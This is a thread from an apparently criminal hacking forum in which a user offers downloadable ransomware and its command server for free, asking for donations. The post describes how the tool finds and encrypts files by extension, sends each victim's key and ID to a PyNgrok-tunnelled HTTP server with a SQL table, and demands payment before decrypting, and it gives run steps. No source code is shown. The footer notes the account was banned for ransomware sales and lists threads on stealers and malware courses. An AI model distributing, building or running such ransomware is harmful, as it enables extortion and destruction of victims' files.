cool ransomware
by Null_SQL - Thursday December 26, 2024 at 06:03 PM
#1
some great ransomware if anyone needs it Wink
Donations are welcome

ransomware:
https://file.io/7WIx98arqNB1

server:
https://file.io/L4bF52PqXoCt
Program Structure:
[/url]
In order for the program to work from anywhere in the world, the server uses PyNgrok to tunnel it and make the server reacheable from evrywhere.
The project is composed of two main parts/programs: the server and the ransomware
the server is organised in two parts:
  • SQL database: create a SQL database with a CLIENT table where user datas such as key, digits, time are stored in there
  • HTTP server: basic http server to handle POST requests made from the ransomware.
the ransomware is organised in four parts:
  • Find Files: find files by extensions and store the path into path.txt
  • Encrypt Files: encrypt files in path.txt, generate digits id, send key and id
  • Decrypt: ask for money, wait for the key, and decrypt file if key is correct
  • Send data: send data to our http server
How to run
[url=1]

You need to have python3 installed and configured
  • Download the repository via git or zip
  • Install requirements:
    pip install -r requirements.txt
1.Run the server:
python3 server.py
Before running the ransomware, you'll need to modify a few things in ransom.py:
  1. Put the url you've got when you started the server:
  2. I recommend running it in a testing directory, otherwise all of your files will be encrypted:
  3. Run it:
    python3 ransom0.py
    [/url]

[url=1]



Testing
[/url]
This Program have been test on:
  • Windows 10
  • Mac OS Catalina 10.15.6 (19G73)
  • Mac OS Big Sur 11.2.1 (20D74)
Any donation are welcome
[url=1]

Donations are welcome
[url=1][/url]

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Ransomware sales/discussion/recruiting | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Go] Using the recycle bin for stealthy persistence (Beginner tutorial) CreateThread 17 1,020 Yesterday, 11:13 PM
Last Post: learn1
  [Sektor7] Full Recent Course Spearr 31 803 Yesterday, 11:11 PM
Last Post: learn1
  [ LIST ] 5 FREE STEALERS WITH PROS/CONS elix 388 15,186 Yesterday, 10:49 PM
Last Post: learn1
  Xordium stealer for Pulsar v2.4.5 nullvex 26 1,069 Yesterday, 08:14 PM
Last Post: Misanotnessa
  Sektor7 - Malware Development Advanced - Vol.1 Sh4d0w1X 424 43,301 Yesterday, 01:31 PM
Last Post: sud0net

Forum Jump:


 Users browsing this forum: 1 Guest(s)